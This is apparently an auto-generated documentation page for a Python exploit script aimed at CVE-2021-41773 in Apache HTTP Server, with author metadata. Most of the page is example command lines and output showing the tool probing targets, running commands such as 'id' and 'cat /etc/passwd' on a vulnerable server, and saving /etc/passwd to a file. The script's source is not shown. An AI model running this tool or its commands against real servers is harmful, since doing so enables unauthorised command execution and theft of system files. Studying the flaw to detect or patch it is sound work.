Python: module CVE202141773

CVE202141773 (version 1.0.0)

index
cve202141773.py

This script exploits CVE-2021-41773 to print file or/and execute command. ~# python3 CVE202141773.py 127.0.0.1:80 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [-] Target is not vulnerable. ~# python3 CVE202141773.py 127.0.0.1:8080 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. ~# python3 CVE202141773.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 127.0.0.1:8080 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. uid=33(www-data) gid=33(www-data) groups=33(www-data) H4CK root:x:0:0:root:/root:/bin/bash www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ~# python3 CVE202141773.py -f "/etc/passwd" -o out.txt 127.0.0.1:8080 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. ~# cat out.txt root:x:0:0:root:/root:/bin/bash www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ~# python3 CVE202141773.py -u "error" -f "/do/not/exists" 172.17.0.2 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. [-] Exploit is not working (HTTP error 403). ~# python3 CVE202141773.py -f "/do/not/exists" 172.17.0.2 CVE-2021-41773 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. [-] Exploit is not working (HTTP error 404). ~#

Data

__all__ = []
__author_email__ = 'mauricelambert434@gmail.com'
__copyright__ = '\nCVE-2021-41773 Copyright (C) 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n'
__description__ = '\nThis script exploits CVE-2021-41773 to print file or/and execute command.\n'
__license__ = 'GPL-3.0 License'
__maintainer__ = 'Maurice Lambert'
__maintainer_email__ = 'mauricelambert434@gmail.com'
__url__ = 'https://github.com/mauricelambert/CVE-2021-41773'

Author

Maurice Lambert

Data
		__all__ = [] __author_email__ = 'mauricelambert434@gmail.com' __copyright__ = '\nCVE-2021-41773 Copyright (C) 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n' __description__ = '\nThis script exploits CVE-2021-41773 to print file or/and execute command.\n' __license__ = 'GPL-3.0 License' __maintainer__ = 'Maurice Lambert' __maintainer_email__ = 'mauricelambert434@gmail.com' __url__ = 'https://github.com/mauricelambert/CVE-2021-41773'